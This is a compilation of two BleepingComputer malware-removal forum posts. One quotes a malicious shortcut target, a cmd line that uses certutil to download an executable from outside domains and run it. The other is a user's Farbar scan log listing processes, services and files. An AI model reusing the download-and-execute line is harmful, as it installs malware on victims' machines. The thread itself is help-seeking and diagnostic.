Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Image
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

Laptop started going to 99-100% CPU suddenly......infected with ??? - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Laptop started going to 99-100% CPU suddenly......infected with ??? - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer


Laptop started going to 99-100% CPU suddenly......infected with ??? - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Posted: 29 Nov 2019 12:00 AM PST

Laptop HP stream was working fine, then it slowed way down. When I went to task manager I noticed it going to 99-100% CPU which it was not doing before. Not sure what I picked up???

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 25-11-2019 01
Ran by JasonSt (administrator) on JASONS (Hewlett-Packard HP Stream Notebook PC 11) (29-11-2019 15:22:00)
Running from C:\Users\JasonSt\Downloads
Loaded Profiles: JasonSt (Available Profiles: JasonSt)
Platform: Windows 8.1 Connected (Update) (X64) Language: English (United States)
Default browser: Chrome
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\aswidsagent.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(BitTorrent Inc -> BitTorrent Inc.) C:\Users\JasonSt\AppData\Roaming\uTorrent\helper\helper.exe
(BitTorrent Inc -> BitTorrent Inc.) C:\Users\JasonSt\AppData\Roaming\uTorrent\updates\3.5.5_45395\utorrentie.exe
(BitTorrent Inc -> BitTorrent Inc.) C:\Users\JasonSt\AppData\Roaming\uTorrent\updates\3.5.5_45395\utorrentie.exe
(BitTorrent Inc -> BitTorrent Inc.) C:\Users\JasonSt\AppData\Roaming\uTorrent\uTorrent.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\StikyNot.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\WWAHost.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7637208 2014-09-15] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [DptfPolicyLpmServiceHelper] => C:\Windows\System32\DptfPolicyLpmServiceHelper.exe [111488 2014-09-05] (Intel® Software -> Intel Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2855664 2014-09-05] (Synaptics Incorporated -> Synaptics Incorporated)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [268680 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe [507192 2014-07-21] (Hewlett-Packard Company -> Hewlett-Packard Development Company, L.P.)
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [83524968 2019-11-12] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [24552064 2019-10-15] (Piriform Software Ltd -> Piriform Ltd)
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [479744 2014-11-21] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\Run: [uTorrent] => C:\Users\JasonSt\AppData\Roaming\uTorrent\uTorrent.exe [2005224 2019-11-05] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\Policies\Explorer: [NolowDiskSpaceChecks] 1
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\75.0.3770.100\Installer\chrmstp.exe [2019-07-03] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\75.0.3770.100\Installer\chrmstp.exe [2019-07-03] (Google LLC -> Google LLC)
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {3F99B290-AAC8-4123-8000-980238021EBB} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [3933576 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
Task: {78E9F272-075E-4019-90BB-28556801FD46} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [608384 2019-10-15] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {82253D40-4652-4B1E-B9E5-3ED44957649C} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => %windir%\system32\rundll32.exe aepdu.dll,AePduRunUpdate -nolegacy
Task: {83E0DE61-C54B-48CB-9247-176659CC8105} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {8A8446AC-8FA3-401D-B7E6-52123E0E71A1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154920 2019-07-03] (Google Inc -> Google LLC)
Task: {8EA5AFDE-38E5-4A12-81DE-3723E5FBF652} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [1873288 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
Task: {B927DBAF-D2AC-4323-940F-7FFB1FDE4F0B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154920 2019-07-03] (Google Inc -> Google LLC)
Task: {C796EAAA-60EF-4971-B1DC-8857FB68616E} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [18458752 2019-10-15] (Piriform Software Ltd -> Piriform Ltd)
Task: {CFCC10C2-897D-4FF5-BB38-DCC8E8D4FC25} - System32\Tasks\HPCheckDropBoxStatus => c:\hp\HPQWare\DropBox\HPAppDetector.exe [88864 2014-06-19] (Hewlett-Packard Company -> )
Task: {E1F8A647-3BA4-4A2A-BAF8-9F7633B0C30B} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [267440 2019-08-02] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [121704 2011-08-31] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [132968 2011-08-31] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{B73FD225-ADF5-4F5D-BD5A-6A18CC356CDC}: [DhcpNameServer] 192.168.0.1
Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.msn.com/HPNOT14/1
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.msn.com/HPNOT14/1
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://js.redirect.hp.com/jumpstation?bd=all&c=144&locale=ww_ww&pf=cnnb&s=ieHPtab&tp=iehome
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/en-xl/?ocid=iehp
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {68127DF2-7504-46AE-B573-9E874CA84C2B} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-4252122962-1682857245-3195559886-1001 -> {68127DF2-7504-46AE-B573-9E874CA84C2B} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_16_0_0_257.dll [2019-08-02] (Adobe Systems Incorporated -> )
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_257.dll [2019-08-02] (Adobe Systems Incorporated -> )
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-07-03] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-07-03] (Google Inc -> Google LLC)
CHR StartupUrls: Default -> "hxxps://www.google.com/"
CHR Profile: C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default [2019-11-29]
CHR Extension: (Slides) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-07-03]
CHR Extension: (Adblocker for Chrome - NoAds) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\alplpnakfeabeiebipdmaenpmbgknjce [2019-07-03]
CHR Extension: (Docs) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-07-03]
CHR Extension: (Google Drive) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-07-03]
CHR Extension: (YouTube) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-07-03]
CHR Extension: (Sheets) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-07-03]
CHR Extension: (Google Docs Offline) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-07-03]
CHR Extension: (Chrome Web Store Payments) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (Gmail) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-07-03]
CHR Extension: (Chrome Media Router) - C:\Users\JasonSt\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-07-03]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [6085360 2019-09-26] (AVAST Software s.r.o. -> AVAST Software)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [996880 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
S3 DptfParticipantAcpiProcessorService; C:\WINDOWS\system32\DptfParticipantProcessorService.exe [115656 2014-09-05] (Intel® Software -> Intel Corporation)
S3 HPWMISVC; c:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe [476984 2014-07-21] (Hewlett-Packard Company -> Hewlett-Packard Development Company, L.P.)
S3 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [318568 2014-09-15] (Intel Corporation - pGFX -> Intel Corporation)
S3 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-02] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-02] (Intel® Trusted Connect Service -> Intel® Corporation)
S3 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [292568 2014-09-15] (Realtek Semiconductor Corp -> Realtek Semiconductor)
S3 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [220912 2014-09-05] (Synaptics Incorporated -> Synaptics Incorporated)
S3 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11814232 2019-06-05] (TeamViewer GmbH -> TeamViewer GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2015-01-17] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-01-17] (Microsoft Corporation -> Microsoft Corporation)
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R0 aswArDisk; C:\WINDOWS\System32\drivers\aswArDisk.sys [37616 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R1 aswArPot; C:\WINDOWS\System32\drivers\aswArPot.sys [204824 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\WINDOWS\System32\drivers\aswbidsdriver.sys [274456 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\WINDOWS\System32\drivers\aswbidsh.sys [209552 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\WINDOWS\System32\drivers\aswbuniv.sys [65120 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\WINDOWS\System32\drivers\aswKbd.sys [42736 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R2 aswMonFlt; C:\WINDOWS\System32\drivers\aswMonFlt.sys [171520 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R1 aswRdr; C:\WINDOWS\System32\drivers\aswRdr2.sys [110320 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\WINDOWS\System32\drivers\aswRvrt.sys [83792 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\WINDOWS\System32\drivers\aswSnx.sys [848432 2019-09-30] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSP; C:\WINDOWS\System32\drivers\aswSP.sys [460448 2019-09-30] (AVAST Software s.r.o. -> AVAST Software)
R2 aswStm; C:\WINDOWS\System32\drivers\aswStm.sys [236024 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\WINDOWS\System32\drivers\aswVmm.sys [316528 2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
S3 AX88772; C:\WINDOWS\system32\DRIVERS\ax88772.sys [113864 2013-07-18] (WDKTestCert asix,130126255272009909 -> ASIX Electronics Corp.)
S3 bcmfn2; C:\WINDOWS\System32\drivers\bcmfn2.sys [17624 2013-08-13] (Broadcom Corporation -> Windows ® Win 7 DDK provider)
S3 cpuz145; C:\WINDOWS\temp\cpuz145\cpuz145_x64.sys [49968 2019-11-27] (CPUID -> CPUID)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 DptfDevAcpiProc; C:\WINDOWS\system32\DRIVERS\DptfDevAcpiProc.sys [198808 2014-09-05] (Intel® Software -> Intel Corporation)
S3 DptfDevDisplay; C:\WINDOWS\System32\drivers\DptfDevDisplay.sys [70752 2014-09-05] (Intel® Software -> Intel Corporation)
S3 DptfDevDram; C:\WINDOWS\System32\drivers\DptfDevDram.sys [145640 2014-09-05] (Intel® Software -> Intel Corporation)
S3 DptfDevFan; C:\WINDOWS\System32\drivers\DptfDevFan.sys [50640 2014-09-05] (Intel® Software -> Intel Corporation)
R3 DptfDevGen; C:\WINDOWS\system32\DRIVERS\DptfDevGen.sys [78504 2014-09-05] (Intel® Software -> Intel Corporation)
S3 DptfDevPch; C:\WINDOWS\System32\drivers\DptfDevPch.sys [116752 2014-09-05] (Intel® Software -> Intel Corporation)
S3 DptfDevPower; C:\WINDOWS\System32\drivers\DptfDevPower.sys [71808 2014-09-05] (Intel® Software -> Intel Corporation)
R3 DptfManager; C:\WINDOWS\system32\DRIVERS\DptfManager.sys [493240 2014-09-05] (Intel® Software -> Intel Corporation)
R3 GPIO; C:\WINDOWS\System32\drivers\iaiogpioe.sys [31232 2014-08-11] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
R3 iaioi2c; C:\WINDOWS\System32\drivers\iaioi2ce.sys [69632 2014-08-11] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
R0 MBI; C:\WINDOWS\System32\drivers\MBI.sys [29464 2014-08-05] (Intel® Software -> Intel Corporation)
S3 RTL8168; C:\WINDOWS\system32\DRIVERS\Rt630x64.sys [591360 2013-06-18] (Microsoft Windows -> Realtek )
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 SynRMIHID; C:\WINDOWS\system32\DRIVERS\SynRMIHID.sys [42736 2014-09-05] (Synaptics Incorporated -> Synaptics Incorporated)
R3 TXEIx64; C:\WINDOWS\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation - Client Components Group -> Intel Corporation)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [35320 2015-01-17] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [258368 2015-01-17] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [114496 2015-01-17] (Microsoft Windows -> Microsoft Corporation)
R3 WirelessButtonDriver; C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [20800 2013-07-23] (Hewlett-Packard Company -> Hewlett-Packard Development Company, L.P.)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ===================
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-11-29 15:22 - 2019-11-29 15:22 - 000019083 _____ C:\Users\JasonSt\Downloads\FRST.txt
2019-11-29 15:20 - 2019-11-29 15:20 - 002262016 _____ (Farbar) C:\Users\JasonSt\Downloads\FRST64.exe
2019-11-29 15:20 - 2019-11-29 15:20 - 000000000 ____D C:\Users\JasonSt\Downloads\FRST-OlderVersion
2019-11-29 10:35 - 2019-11-29 10:42 - 220199200 ____R C:\Users\JasonSt\Downloads\Winnie the Pooh and Christmas Too (1991) [TVRip] - QuincyMKT.avi
2019-11-27 21:09 - 2019-11-27 21:09 - 008218800 _____ (Malwarebytes) C:\Users\JasonSt\Downloads\adwcleaner_8.0.0.exe
2019-11-27 20:58 - 2019-09-12 09:59 - 000178960 _____ (IObit) C:\WINDOWS\system32\IObitSmartDefragExtension.dll
2019-11-27 20:55 - 2019-11-27 20:55 - 065437696 _____ C:\WINDOWS\system32\config\SOFTWARE.iobit
2019-11-27 20:55 - 2019-11-27 20:55 - 000290816 _____ C:\WINDOWS\system32\config\DEFAULT.iobit
2019-11-27 20:55 - 2019-11-27 20:55 - 000028672 _____ C:\WINDOWS\system32\config\SAM.iobit
2019-11-27 20:55 - 2019-11-27 20:55 - 000024576 _____ C:\WINDOWS\system32\config\SECURITY.iobit
2019-11-26 20:31 - 2019-11-26 20:31 - 000017132 _____ C:\Users\JasonSt\Downloads\187333-killing.me.softly.2012.brrip.xvid.ac3war.zip
2019-11-26 20:27 - 2019-11-26 21:01 - 745379840 _____ C:\Users\JasonSt\Downloads\Something Wild.avi
2019-11-18 23:46 - 2019-11-18 23:46 - 000000000 ____D C:\Users\JasonSt\Documents\Apowersoft
2019-11-18 23:45 - 2019-11-18 23:46 - 000000000 ____D C:\Users\JasonSt\AppData\Local\Apowersoft
2019-11-18 23:45 - 2019-11-18 23:45 - 000000000 ____D C:\Users\JasonSt\AppData\Roaming\Apowersoft
2019-11-18 22:09 - 2019-11-18 22:09 - 000030743 _____ C:\Users\JasonSt\Downloads\221509-somethingwild1986.zip
2019-11-14 22:52 - 2017-03-09 13:53 - 000045664 _____ (IObit) C:\WINDOWS\system32\SmartDefragBootTime.exe
2019-11-14 22:50 - 2019-11-14 22:51 - 016297184 _____ (IObit ) C:\Users\JasonSt\Downloads\smart-defrag-setup.exe
2019-11-14 22:37 - 2019-11-14 22:37 - 004833280 _____ C:\WINDOWS\system32\config\DRIVERS.iobit
2019-11-14 22:30 - 2019-11-27 20:52 - 000000000 ____D C:\ProgramData\ProductData
2019-11-14 22:30 - 2019-11-27 20:51 - 000000000 ____D C:\Users\JasonSt\AppData\LocalLow\IObit
2019-11-14 22:30 - 2019-11-14 22:30 - 000000000 ____D C:\WINDOWS\Tasks\ImCleanDisabled
2019-11-14 22:30 - 2019-11-14 22:30 - 000000000 ____D C:\ProgramData\{F86B0233-9A85-4589-8AAF-524CC4F8211B}
2019-11-14 22:29 - 2019-11-27 21:04 - 000000000 ____D C:\Program Files (x86)\IObit
2019-11-14 22:29 - 2019-11-27 20:59 - 000000000 ____D C:\Users\JasonSt\AppData\Roaming\IObit
2019-11-14 22:29 - 2019-11-27 20:58 - 000000000 ____D C:\ProgramData\IObit
2019-11-14 22:28 - 2019-11-14 22:29 - 049471584 _____ (IObit ) C:\Users\JasonSt\Downloads\advanced-systemcare-setup.exe
2019-11-06 10:55 - 2019-11-06 10:55 - 000110218 _____ C:\Users\JasonSt\Downloads\5837eForeignerForm.pdf
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-11-29 15:22 - 2019-07-20 11:07 - 000000000 ____D C:\Users\JasonSt\AppData\Roaming\uTorrent
2019-11-29 15:22 - 2019-07-04 21:09 - 000000000 ____D C:\FRST
2019-11-29 15:20 - 2019-07-04 13:17 - 003527168 ___SH C:\Users\JasonSt\Downloads\Thumbs.db
2019-11-29 14:36 - 2014-11-21 05:42 - 000762136 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2019-11-29 14:36 - 2013-08-22 14:36 - 000000000 ____D C:\WINDOWS\Inf
2019-11-29 13:31 - 2019-07-03 17:53 - 000003600 _____ C:\WINDOWS\system32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-4252122962-1682857245-3195559886-1001
2019-11-29 13:01 - 2019-08-09 23:40 - 000000000 ____D C:\Users\JasonSt\AppData\LocalLow\uTorrent
2019-11-29 13:01 - 2019-07-20 11:07 - 000000000 ____D C:\Users\JasonSt\AppData\Local\BitTorrentHelper
2019-11-29 12:46 - 2013-08-22 15:45 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-11-29 09:30 - 2019-07-03 17:48 - 000000000 ____D C:\Users\JasonSt
2019-11-28 10:06 - 2019-07-03 17:58 - 000004168 _____ C:\WINDOWS\system32\Tasks\Avast Emergency Update
2019-11-28 09:40 - 2019-07-04 11:02 - 000004128 _____ C:\WINDOWS\system32\Tasks\CCleaner Update
2019-11-27 20:56 - 2015-01-17 08:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2019-11-27 10:53 - 2019-07-06 22:20 - 000000000 ____D C:\AmericasCardroom
2019-11-15 18:57 - 2019-07-04 10:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2019-11-14 22:42 - 2019-07-04 09:55 - 000000000 ____D C:\Users\JasonSt\AppData\Local\Hewlett-Packard
2019-11-14 22:42 - 2019-07-03 17:52 - 000000000 ____D C:\Users\JasonSt\AppData\Roaming\Hewlett-Packard
2019-11-14 22:42 - 2015-05-22 00:19 - 000000000 ____D C:\ProgramData\Hewlett-Packard
2019-11-14 22:42 - 2015-01-17 08:01 - 000000000 ____D C:\Program Files (x86)\Hewlett-Packard
2019-11-14 22:42 - 2015-01-16 19:29 - 000000000 ___HD C:\hp
2019-11-14 22:33 - 2014-12-10 05:00 - 000000000 ____D C:\WINDOWS\Panther
2019-11-12 23:43 - 2019-08-24 23:29 - 000000000 ____D C:\Users\JasonSt\AppData\Local\CrashDumps
2019-10-31 11:28 - 2019-07-20 11:07 - 000000000 ____D C:\Users\JasonSt\AppData\Roaming\Lavasoft
2019-10-31 11:28 - 2019-07-20 11:07 - 000000000 ____D C:\Users\JasonSt\AppData\Local\Lavasoft
2019-10-31 11:28 - 2019-07-20 11:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2019-10-31 11:28 - 2019-07-20 11:07 - 000000000 ____D C:\ProgramData\Lavasoft
2019-10-31 11:28 - 2019-07-20 11:07 - 000000000 ____D C:\Program Files (x86)\Lavasoft
2019-10-31 11:28 - 2019-07-06 14:30 - 000000000 ____D C:\AdwCleaner
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
LastRegBack: 2019-11-22 20:24
==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 25-11-2019 01
Ran by JasonSt (29-11-2019 15:23:52)
Running from C:\Users\JasonSt\Downloads
Windows 8.1 Connected (Update) (X64) (2019-07-03 16:48:05)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-4252122962-1682857245-3195559886-500 - Administrator - Disabled)
Guest (S-1-5-21-4252122962-1682857245-3195559886-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-4252122962-1682857245-3195559886-1003 - Limited - Enabled)
JasonSt (S-1-5-21-4252122962-1682857245-3195559886-1001 - Administrator - Enabled) => C:\Users\JasonSt
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
